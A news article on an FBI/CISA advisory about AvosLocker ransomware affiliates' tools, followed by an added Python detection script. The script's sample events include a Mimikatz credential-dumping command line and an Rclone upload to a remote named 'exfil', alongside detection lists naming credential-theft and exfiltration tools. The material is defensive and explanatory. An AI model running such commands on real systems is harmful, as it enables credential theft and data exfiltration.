From Legit Software to Ransomware: AvosLocker’s Stealth Tactics Exposed
In a joint advisory, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released new details about the tools used by affiliates of the AvosLocker ransomware, on which the FBI had previously reported.
The advisory notes that AvosLocker affiliates rely on legitimate software and open-source tools for remote administration and for exfiltrating data from corporate networks.
The FBI documented the use of custom PowerShell, web shells, and batch scripts for lateral movement, privilege escalation, and disabling security software.
Highlighted in the updated agency report are tools such as:
- Remote system administration tools, including Splashtop Streamer, Tactical RMM, PuTTY, AnyDesk, PDQ Deploy, and Atera Agent, used as backdoor access vectors [T1133].
- Scripts that invoke legitimate Windows administration tools [T1047], such as Nltest and the Sysinternals utility PsExec.
- Open-source networking tunneling tools [T1572] Ligolo and Chisel.
- Cobalt Strike and Sliver for command and control (C2).
- LaZagne and Mimikatz for harvesting credentials [T1555].
- FileZilla and Rclone for data exfiltration.
- Notepad++, RDP Scanner, and 7zip.
Another recurring component of these attacks is a malicious executable named "NetMonitor.exe". It masquerades as a legitimate process and acts as a reverse proxy that gives the adversaries a way back into the compromised network. The advisory includes a YARA rule for detecting NetMonitor on a network.
“AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data,” the FBI and CISA write.
The agencies recommend that organizations implement application controls, including allowlisting, and block the execution of portable versions of unauthorized utilities.
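As an added illustration, not code from the advisory or from the FBI or CISA, the following Python snippet applies the two points above, the tool list and the recommendation to block portable copies of unauthorized utilities, to constructed Sysmon-style process-creation events. Every known tool that runs from outside a trusted install root is flagged as a portable copy, and the tools themselves are bucketed by the role the advisory gives them (remote access, credential theft, tunneling, lateral movement, discovery, exfiltration). The image names, the trusted roots, the approved-tool set and the sample events are assumptions to be tuned per environment, and the NetMonitor check matches on file name only; it is no substitute for the advisory's YARA rule.

```python
"""
Process-creation triage for the tooling named in the FBI/CISA AvosLocker advisory.
Added example, not from the advisory: image names, paths, the approved-tool set
and the sample events are constructed assumptions and should be tuned locally.
"""
import re
from pathlib import PureWindowsPath

# Tools the advisory names, keyed by the image name a defender would expect.
# Binary names for some RMM agents differ by version (assumption: tune these).
REMOTE_ADMIN = {"anydesk.exe", "putty.exe", "ateraagent.exe", "tacticalrmm.exe"}
CRED_THEFT = {"mimikatz.exe", "lazagne.exe"}
EXFIL = {"rclone.exe", "filezilla.exe"}
TUNNEL = {"chisel.exe", "ligolo.exe"}
LATERAL = {"psexec.exe", "psexec64.exe"}
DISCOVERY = {"nltest.exe"}
MASQUERADE = {"netmonitor.exe"}  # reverse proxy the advisory calls out by name
KNOWN_TOOLS = REMOTE_ADMIN | CRED_THEFT | EXFIL | TUNNEL | LATERAL | DISCOVERY | MASQUERADE

# Remote admin tool the organisation has actually approved (assumption).
ORG_APPROVED = {"ateraagent.exe"}

# Only binaries under these roots count as installed; any known tool running
# from elsewhere (Downloads, Temp, ProgramData, a share) is a portable copy.
TRUSTED_ROOTS = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\system32\\",
)

AD_DISCOVERY_ARGS = re.compile(r"/(dclist|domain_trusts|trusted_domains)", re.I)
# rclone copy/sync/move with a "<remote>:" destination, i.e. an upload.
RCLONE_TRANSFER = re.compile(r"\b(copy|copyto|sync|move)\b\s+\S+\s+\S+:", re.I)


def classify(event: dict) -> list[str]:
    """Return the findings for one Sysmon-style process-creation event."""
    image = event["Image"]
    cmd = event.get("CommandLine", "")
    name = PureWindowsPath(image).name.lower()
    findings: list[str] = []

    if name not in KNOWN_TOOLS:
        return findings

    if not image.lower().startswith(TRUSTED_ROOTS):
        findings.append("portable-copy")
    if name in MASQUERADE:
        findings.append("netmonitor-masquerade")
    if name in CRED_THEFT:
        findings.append("credential-theft")
    if name in REMOTE_ADMIN and name not in ORG_APPROVED:
        findings.append("unauthorized-remote-admin")
    if name in TUNNEL:
        findings.append("tunnel")
    if name in LATERAL:
        findings.append("lateral-psexec")
    if name in DISCOVERY and AD_DISCOVERY_ARGS.search(cmd):
        findings.append("ad-discovery")
    if name == "rclone.exe" and RCLONE_TRANSFER.search(cmd):
        findings.append("exfil-rclone")
    elif name in EXFIL:
        findings.append("exfil-tool")
    return findings


def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map each flagged image path to its findings; clean events are omitted."""
    report: dict[str, list[str]] = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            report[ev["Image"]] = hits
    return report


# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": "C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe",
     "CommandLine": "AteraAgent.exe", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe", "User": "CORP\\jdoe"},
    {"Image": "C:\\ProgramData\\NetMonitor.exe",
     "CommandLine": "NetMonitor.exe", "User": "CORP\\jdoe"},
    {"Image": "C:\\Windows\\System32\\nltest.exe",
     "CommandLine": "nltest /dclist:corp", "User": "CORP\\jdoe"},
    {"Image": "C:\\Temp\\rclone.exe",
     "CommandLine": "rclone.exe copy C:\\Finance remote:exfil --transfers 8",
     "User": "CORP\\jdoe"},
    {"Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\mimikatz.exe",
     "CommandLine": "mimikatz.exe privilege::debug sekurlsa::logonpasswords exit",
     "User": "CORP\\jdoe"},
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(hits)}")
```

The approved Atera agent running from Program Files produces no finding, which is the allowlisting point: the same product is only suspicious when it is a copy the organization did not deploy or when it runs from a user-writable path. In production the findings would feed an application-control policy (block the portable copies) rather than stay in a report.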
Among the recommended defenses are limiting the use of the Remote Desktop Protocol (RDP), enforcing multi-factor authentication (MFA), and applying the principle of least privilege. Organizations are also advised to disable command-line and scripting capabilities, including PowerShell, for users who do not need them in their work.
Keeping software up to date, using long passwords that are stored only in hashed form, and segmenting the network remain standing recommendations.
The current advisory updates the one the FBI published in March of the previous year, which noted that in some attacks AvosLocker affiliates exploited vulnerabilities in on-premises Microsoft Exchange servers.